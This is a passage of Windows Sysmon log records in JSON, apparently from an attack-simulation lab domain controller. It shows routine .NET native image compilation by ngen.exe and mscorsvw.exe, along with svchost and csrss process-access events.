{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8143,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.131\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228B-5F25-0000-001059250F00}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.131","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228B-5F25-0000-001059250F00}","TargetProcessId":"748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8144,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:07.397\r\nProcessGuid: {41C8662E-22AB-5F25-0000-0010765E1000}\r\nProcessId: 748\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\2ec-0\\System.Web.Entity.dll\r\nCreationUtcTime: 2020-08-01 08:07:07.397","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:07.397","ProcessGuid":"{41C8662E-22AB-5F25-0000-0010765E1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\2ec-0\\System.Web.Entity.dll","CreationUtcTime":"2020-08-01 08:07:07.397","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8145,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.428\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-00104E631000}\r\nTargetProcessId: 4256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.428","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-00104E631000}","TargetProcessId":"4256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8146,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.443\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-00104E631000}\r\nTargetProcessId: 4256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.443","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-00104E631000}","TargetProcessId":"4256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8147,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.443\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-00104E631000}\r\nTargetProcessId: 4256\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.443","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22AB-5F25-0000-00104E631000}","TargetProcessId":"4256","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8148,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.537\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-001072350F00}\r\nTargetProcessId: 1152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.537","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-001072350F00}","TargetProcessId":"1152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8149,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.537\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-001072350F00}\r\nTargetProcessId: 1152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.537","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-001072350F00}","TargetProcessId":"1152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8150,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-228D-5F25-0000-001072350F00}\r\nTargetProcessId: 1152\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:07.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-228D-5F25-0000-001072350F00}","TargetProcessId":"1152","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8151,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:07.756\r\nProcessGuid: {41C8662E-22AB-5F25-0000-00104E671000}\r\nProcessId: 1152\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\480-0\\System.Web.Entity.Design.dll\r\nCreationUtcTime: 2020-08-01 08:07:07.756","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:07.756","ProcessGuid":"{41C8662E-22AB-5F25-0000-00104E671000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\480-0\\System.Web.Entity.Design.dll","CreationUtcTime":"2020-08-01 08:07:07.756","EventReceivedTime":"2020-08-01 08:07:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8152,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:07.803\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AB-5F25-0000-00103B6C1000}\r\nTargetProcessId: 3776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 